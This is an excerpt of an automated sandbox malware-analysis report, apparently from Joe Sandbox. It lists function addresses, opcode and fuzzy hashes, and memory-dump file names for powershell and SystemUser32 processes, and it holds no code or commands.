                                                • Instruction ID: 746a2af492c4e0dcb2f0938c2fce2f426c5b6f397918083b310472d9211670ed
                                                • Opcode Fuzzy Hash: 0a2eb5a376bfeabf986cfa8300784f11ac78828eb38e9dbc6e1581899b3bbfd4
                                                • Instruction Fuzzy Hash: 9B21F562F0EA868FF7A5CB1C84551746AD1EF62290B8981BAD16DC71D3DE28DC099381
                                                Function 00007FFAACDB43BC Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 431985be4cc850a9e2e162514e7e0a9373abee9702c275fe2595e5442df83a0f
                                                • Instruction ID: c6fc0ee647e881d3fb452a53e68891c1820d19c551c1ca00fd6d41b549d506bd
                                                • Opcode Fuzzy Hash: 431985be4cc850a9e2e162514e7e0a9373abee9702c275fe2595e5442df83a0f
                                                • Instruction Fuzzy Hash: B311C672A4F6498FF7A5D72894549747FD1EF4622078D40FAD16DC7193DE18EC148381
                                                Function 00007FFAACCE33B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction ID: 2679195378a422fb07696bd46d7ab694e2d0dc30f21eb567d9445c9b80d07752
                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction Fuzzy Hash: BD01847010CB088FD744EF0CE051AA5B3E0FB89320F10052DE58AC3661DB22E882CB41
                                                Function 00007FFAACCEA2A9 Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 274be616b2a51ed74687d74400572b31c09e48ba4e80211f0984dd83a716637d
                                                • Instruction ID: f18f48c0224386ac2d71641b8cff1741d7e500fa01fb04232e4e3eb1e6b8b462
                                                • Opcode Fuzzy Hash: 274be616b2a51ed74687d74400572b31c09e48ba4e80211f0984dd83a716637d
                                                • Instruction Fuzzy Hash: E3E04875904A4C8F9B44DF18D4555E57FE0FF65301B01425BE41DD7120DB71D958CBC1
                                                Function 00007FFAACBCEC99 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1585880347.00007FFAACBCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacbcd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ebc07732169cc6b5beb847de7f21c8cb7c97c45c15caa677e14c31db907f577b
                                                • Instruction ID: 9dd6b420065ad05d6593ac4ed4e616991cd3501f6746d536bf3b677321647f04
                                                • Opcode Fuzzy Hash: ebc07732169cc6b5beb847de7f21c8cb7c97c45c15caa677e14c31db907f577b
                                                • Instruction Fuzzy Hash: 4CE01A3061ED09CFDA95EB29C085D2637E1FB68300B204468D05ECB251C635F882CB81

                                                Non-executed Functions

                                                Function 00007FFAACCE8995 Relevance: 5.1, Strings: 4, Instructions: 137COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K_^$K_^$K_^$K_^
                                                • API String ID: 0-3666970850
                                                • Opcode ID: 8872752845eff945826bc52692320a7512e7eb3dcd42072a5d854f32de3ca58a
                                                • Instruction ID: c312ab7cce92cc6105c1170f4f718693f5fae9670712ededd1460dcf4a00fee2
                                                • Opcode Fuzzy Hash: 8872752845eff945826bc52692320a7512e7eb3dcd42072a5d854f32de3ca58a
                                                • Instruction Fuzzy Hash: 40419FA290E7D29FF75A0B1C586A0E57FE0FF63215B4D42F7C0C8CB493EA19554A8391
                                                Function 00007FFAACCE89FA Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K_^$K_^$K_^$K_^
                                                • API String ID: 0-3666970850
                                                • Opcode ID: e1c98ce7ec0dee100958bc9f6607f33bf4a13c5b3c41a77d3f66f2daa04a40b8
                                                • Instruction ID: ef9316e46c98ba4027b5fced5b84dbbe838176eef8df2cbfc922c1ea4f3ba252
                                                • Opcode Fuzzy Hash: e1c98ce7ec0dee100958bc9f6607f33bf4a13c5b3c41a77d3f66f2daa04a40b8
                                                • Instruction Fuzzy Hash: 03319E9290EBD38BF65A0B1C58650E17FE0FF63229B4D42F2C0CC8B593EE19994A42D1

                                                Executed Functions

                                                Function 00007FFAACDA6605 Relevance: .4, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1782647268.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ca29e748ff8d4e1a370d7043a00fa4a92d067251f2f6d9753fc704d975ceb16
                                                • Instruction ID: ac04aeb4f82eac121930666c9f67dcf54175dae68829a99faeb3950f639cc263
                                                • Opcode Fuzzy Hash: 6ca29e748ff8d4e1a370d7043a00fa4a92d067251f2f6d9753fc704d975ceb16
                                                • Instruction Fuzzy Hash: 15C159B1A0EA8ACFF765AB7888555B9BBD1EF56710B0401BEE45DC70D3DA18D80A83C1
                                                Function 00007FFAACDA6633 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1782647268.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de40dde5839849101e90950a9f13ffcf2f0c66722e5ba11c866efdb0fb1b46fd
                                                • Instruction ID: c11d80cefd933839e42dd95d07738b3f265563ff57aaa23cafb200dd0b47564d
                                                • Opcode Fuzzy Hash: de40dde5839849101e90950a9f13ffcf2f0c66722e5ba11c866efdb0fb1b46fd
                                                • Instruction Fuzzy Hash: 668125A6A1FB86CFF76A97684855574BBA1EF16B10B1840FED05DCB0D3D918DC0A83C1
                                                Function 00007FFAACCD9770 Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: caea7efab79228d449b8c6962fc5f952930926ef390641a1a5bd676990ac2ceb
                                                • Instruction ID: 974d1f4372455f75a80e34a9e25d04949abf9bad501f9313682be9e04dbe6fd2
                                                • Opcode Fuzzy Hash: caea7efab79228d449b8c6962fc5f952930926ef390641a1a5bd676990ac2ceb
                                                • Instruction Fuzzy Hash: FC410A7190CB888FEB199F5CAC466A97FE0FB95311F04416FE44DD3252DA74A815CBC2
                                                Function 00007FFAACBBE620 Relevance: .1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1779998454.00007FFAACBBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaacbbd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b0413d2f8e0225256751b12c26558243ff32d7e297d88da2e914bd0b8d2ce35
                                                • Instruction ID: 5b372c1e1672f6216413306b9256e454936bf8699fc1b834560712159e7bdb6d
                                                • Opcode Fuzzy Hash: 4b0413d2f8e0225256751b12c26558243ff32d7e297d88da2e914bd0b8d2ce35
                                                • Instruction Fuzzy Hash: 0141127140EBC48FE3568B2898459523FF0EF57320B1542DFE088CB1A3D629EC4AC7A2
                                                Function 00007FFAACCDA73C Relevance: .1, Instructions: 118COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d83c79a5356ff805797d8e6427281c83b6f1c223c99a07c156449933e1cf0ee
                                                • Instruction ID: e146458ad780eb78a53004386e33bb1dfe5590ab215ad11203d07799eb75026c
                                                • Opcode Fuzzy Hash: 5d83c79a5356ff805797d8e6427281c83b6f1c223c99a07c156449933e1cf0ee
                                                • Instruction Fuzzy Hash: EE314B7190DB8C8FEB59DF6898497E97FE0EF56321F04816FC048C7152DA64981ACB91
                                                Function 00007FFAACCD33B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                • Instruction ID: c5fe5ef16c9603e2c38b2b8f18b6b479cf07841371c6c5dc00f7d796ae02029c
                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                • Instruction Fuzzy Hash: BB01847010CB088FD744EF0CE051AA5B3E0FB89320F10052EE58AC3661DA22E882CB41
                                                Function 00007FFAACCDA0FB Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b21d7dcebe3804997e75c432417d25688be2d25e56e463f0c76fa9d0cedac36
                                                • Instruction ID: a78a98e1644437f9f5d12fa6bb794eb3ab33272518f9acd4cbc26e61e649ee06
                                                • Opcode Fuzzy Hash: 1b21d7dcebe3804997e75c432417d25688be2d25e56e463f0c76fa9d0cedac36
                                                • Instruction Fuzzy Hash: A0F0F676518A8DCFDB42EF18E8260E57BA0FF26215B0402A7E048C7121E720981887C2
                                                Function 00007FFAACDA414D Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1782647268.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe6c6859014e3686baf0dcfa3c9b4b8596efb39a5b5a5738c434e276cfd41c4f
                                                • Instruction ID: 2f7b6c1e02caa34918869b61dc9f5dc43ed65c31928bf39efaea13db93d200d3
                                                • Opcode Fuzzy Hash: fe6c6859014e3686baf0dcfa3c9b4b8596efb39a5b5a5738c434e276cfd41c4f
                                                • Instruction Fuzzy Hash: BFF0BE32A0D5048FE7A9EB5CE4458A877E0EF5532071100BBE06DC71A3CE29EC44C780
                                                Function 00007FFAACDA4400 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1782647268.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50323958fc934ffc414361fd244ec088b4623c9f91c9544c25c2bcfab8c865f0
                                                • Instruction ID: b3e129a62dda862b19b235864adb6dd9b01eacb040aa40d272a8d478ca85dde8
                                                • Opcode Fuzzy Hash: 50323958fc934ffc414361fd244ec088b4623c9f91c9544c25c2bcfab8c865f0
                                                • Instruction Fuzzy Hash: 68F0BE72A0D5488FE765EB1CE4858A87BE0EF4532071100BAE05DC7063CA69EC44C780
                                                Function 00007FFAACDA41D1 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1782647268.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                • Instruction ID: 43ea41e1f6c0a14adc3675a0c07277ec624c1149e27f531e8fd3b04f9800ceaa
                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                • Instruction Fuzzy Hash: BBE01A31B0C808CFEAA8DB0CE0409A977E1EBA933171151B7D15EC7561CA22EC559BC0

                                                Non-executed Functions

                                                Function 00007FFAACCD8945 Relevance: 6.4, Strings: 5, Instructions: 168COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L_^$L_^$L_^$L_^$L_^
                                                • API String ID: 0-2264858084
                                                • Opcode ID: 9616f8f5bbac49d158eb9333f677b229b79fd41f1ef469c9c23269989c33b7c6
                                                • Instruction ID: 8b9be87e7adfb05c82c991760bc0be63a84c2d8c8ccd631977549520078d1825
                                                • Opcode Fuzzy Hash: 9616f8f5bbac49d158eb9333f677b229b79fd41f1ef469c9c23269989c33b7c6
                                                • Instruction Fuzzy Hash: 3351B2E390E7C68FF35B4B68486A2956FD0EF2321971D81F7C08C8B493EE19595A42D2
                                                Function 00007FFAACCD8BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L_^5$L_^8$L_^F$L_^I$L_^K
                                                • API String ID: 0-3847582561
                                                • Opcode ID: a3d6bcacbf6a75ba7e6140c3883e3e50a13f4c3c104fa515eb82642d965b36b3
                                                • Instruction ID: b03e9b6cbcf809e185e0122594c1df6362a863fdc1a746159d10de827ffdc250
                                                • Opcode Fuzzy Hash: a3d6bcacbf6a75ba7e6140c3883e3e50a13f4c3c104fa515eb82642d965b36b3
                                                • Instruction Fuzzy Hash: 082104B7B141164E92017B7DB8059ED7B84CF84275349A2F2D39C8F513DF14608A8AD4
                                                Function 00007FFAACCD89F5 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L_^$L_^$L_^$L_^
                                                • API String ID: 0-2357752022
                                                • Opcode ID: cf92f4d909d0f143d6f1054e773c6cb402d62256af4d6a35d1489f357cb1ac81
                                                • Instruction ID: 0d9dfb9a95eb2421c1e28ff79d336b3082b5ff5f3575b499e3bffa6adbe03091
                                                • Opcode Fuzzy Hash: cf92f4d909d0f143d6f1054e773c6cb402d62256af4d6a35d1489f357cb1ac81
                                                • Instruction Fuzzy Hash: D13103E390EBC38BF25B071C586A1A56FD0FF2221970D82F7D18C8B483EE15686B42C1

                                                Executed Functions

                                                Function 00007FFAACCD1CA1 Relevance: .2, Instructions: 207COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb14686d1660cd4be64eea7f14d460f3904ef68b7315eed4ed63b256ef2ac917
                                                • Instruction ID: 7bd9f011087dfd6cd6b74964468ac277e14beb8a3dd7860bcbdc2b6b780fcff3
                                                • Opcode Fuzzy Hash: bb14686d1660cd4be64eea7f14d460f3904ef68b7315eed4ed63b256ef2ac917
                                                • Instruction Fuzzy Hash: 65512451A1E6C94FE787AB7898686757FD5DF87225B1804FBE0CDC7193DE184806C382
                                                Function 00007FFAACCD0DE0 Relevance: .6, Instructions: 550COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46a05b47c91c1386f62f1ca05e186d31231875d42acbced232e3658bc5cc66ae
                                                • Instruction ID: 8b2a7b55f02875f45c2b84ca7a9ed4003bb0bd060d345a550ba70fbe0a53044d
                                                • Opcode Fuzzy Hash: 46a05b47c91c1386f62f1ca05e186d31231875d42acbced232e3658bc5cc66ae
                                                • Instruction Fuzzy Hash: 0A31F8A2D1D78A4FE742EB6C98652FD7FB0EF96210F4441BBC08DC7193DE1898098391
                                                Function 00007FFAACCD0E30 Relevance: .5, Instructions: 515COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 751843bd15581674daf4dcc783e17c1cc66936768f49b1131e68effc5370ea33
                                                • Instruction ID: 8960931ea6aeffa62d887537a24278d994a673693d9a1575569c40bae88788f7
                                                • Opcode Fuzzy Hash: 751843bd15581674daf4dcc783e17c1cc66936768f49b1131e68effc5370ea33
                                                • Instruction Fuzzy Hash: AD21B5A191D78A4FEB46EB6888652FD7FB1FF56200F4540ABD04ED31D3DD68A8098391
                                                Function 00007FFAACCD12C9 Relevance: .2, Instructions: 246COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b92b302fb25137f03bde2f1173aaa3a7e6a08f65ccf0e8e417e56be7dccbe450
                                                • Instruction ID: ac718257b1c4c992981f0c1222e5196566d683b18ed257ea2422d3496e3e0c7f
                                                • Opcode Fuzzy Hash: b92b302fb25137f03bde2f1173aaa3a7e6a08f65ccf0e8e417e56be7dccbe450
                                                • Instruction Fuzzy Hash: 5871B561B29A595FEB98BB78D45D7BD76D2FF99310F8044B9E40EC32D2DE2898108740
                                                Function 00007FFAACCD0C3E Relevance: .2, Instructions: 189COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac3e25b31611e9504ad3196bd5f04b2a8e11efd4c0dd4562fe2ce48e7ed61a3e
                                                • Instruction ID: e3e878ae638047a447040b3976ba00a67beb11aee2f0c4419e1ed7bac6d55cd4
                                                • Opcode Fuzzy Hash: ac3e25b31611e9504ad3196bd5f04b2a8e11efd4c0dd4562fe2ce48e7ed61a3e
                                                • Instruction Fuzzy Hash: 45514862A0E7864FE357A73CD8656B57BE1EF87210B0940FBD48CC7193DD189C068392
                                                Function 00007FFAACCD0538 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f32934319395ec48a866719729b27a6d89382ae4e70c1dddb641db87dbcc9a4
                                                • Instruction ID: 94ff98314ea5d649dc05491d577cf56ce1cdf96303168a16ada7346e0ce192b8
                                                • Opcode Fuzzy Hash: 2f32934319395ec48a866719729b27a6d89382ae4e70c1dddb641db87dbcc9a4
                                                • Instruction Fuzzy Hash: A931B562B189490FE688BB6CD45A779B6C6EF99215F0405FEE04EC3293DE649C418380
                                                Function 00007FFAACCD0AD1 Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a95b791de0fdc94f1255f8e7fef2cb87faa55f7050a59e534593944493d7158a
                                                • Instruction ID: 572143fa01fdec74f02e4d1c5c8932cc637afeeca924a08e1d1c35b5a61b4714
                                                • Opcode Fuzzy Hash: a95b791de0fdc94f1255f8e7fef2cb87faa55f7050a59e534593944493d7158a
                                                • Instruction Fuzzy Hash: E731E3A2B19A095FF745BBBC885E7BD77D5EF99211F0442BBE00DC3292DE2898018391
                                                Function 00007FFAACCD0985 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c26771c8819ac657d6e63a1d7735ad6819962e5a1ff6ea6f6d053e5f3317a62c
                                                • Instruction ID: 2afb0830b03dac990b602e7435aecb94f6819955817743ded954f934a0f32a7a
                                                • Opcode Fuzzy Hash: c26771c8819ac657d6e63a1d7735ad6819962e5a1ff6ea6f6d053e5f3317a62c
                                                • Instruction Fuzzy Hash: 7631A2B1A18A4E8FEB45EB78D459BEDBBE1FF99300F5045B9D00DC3282DE78A8058741
                                                Function 00007FFAACCD0868 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04fa2b16315c931626509f38fabf191d5ef2a7c102c0d8ba3a3f0405f25c3715
                                                • Instruction ID: 23245d7dac91066a985e4d1007b851cb0e9f53063f91f0da148e380e25fcfc4b
                                                • Opcode Fuzzy Hash: 04fa2b16315c931626509f38fabf191d5ef2a7c102c0d8ba3a3f0405f25c3715
                                                • Instruction Fuzzy Hash: BA21D7F555868A4FD340FB28D45CEA9FFA1EFAA310FA044E9D00DC3797DEA499008B42
                                                Function 00007FFAACCD1E71 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.1851472538.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e656a052dbbfeafa65b84256f53ba58c1169f23de3fc821a8274bc030885d45
                                                • Instruction ID: 521208b224f36c6c5f99ef35ad59ba724f48bf1e1a6a8c5b30dbaea7d9fe93c3
                                                • Opcode Fuzzy Hash: 1e656a052dbbfeafa65b84256f53ba58c1169f23de3fc821a8274bc030885d45
                                                • Instruction Fuzzy Hash: BC01F25590E7C58FF752AB385859662BFE0DFA7220F0804ABE48CC6493E918A95883C2

                                                Executed Functions

                                                Function 00007FFAACCD1CA1 Relevance: .2, Instructions: 207COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f14531144f357f54c3f39d957497439ef6c2cc4b7207b68d953663503f90f68a
                                                • Instruction ID: b0ae58d868130d3746eb79c60893c72205214ed6c4a1de0c840848b2682837ed
                                                • Opcode Fuzzy Hash: f14531144f357f54c3f39d957497439ef6c2cc4b7207b68d953663503f90f68a
                                                • Instruction Fuzzy Hash: 60512451A1E6C94FE787AB7898646757FD5DF87225B1804FBE0CDC7193DE184806C382
                                                Function 00007FFAACCD0DE0 Relevance: .6, Instructions: 550COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.1963748277.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0aab3e3e4f9fc5d7cca3c9d103490d44dd96b8c8d0363243163e4a70d2094c2a
                                                • Instruction ID: 542c4997f3e7f7c2d4b52d8f7da70df7d972e14129332c6a3fea478725ba0a7a
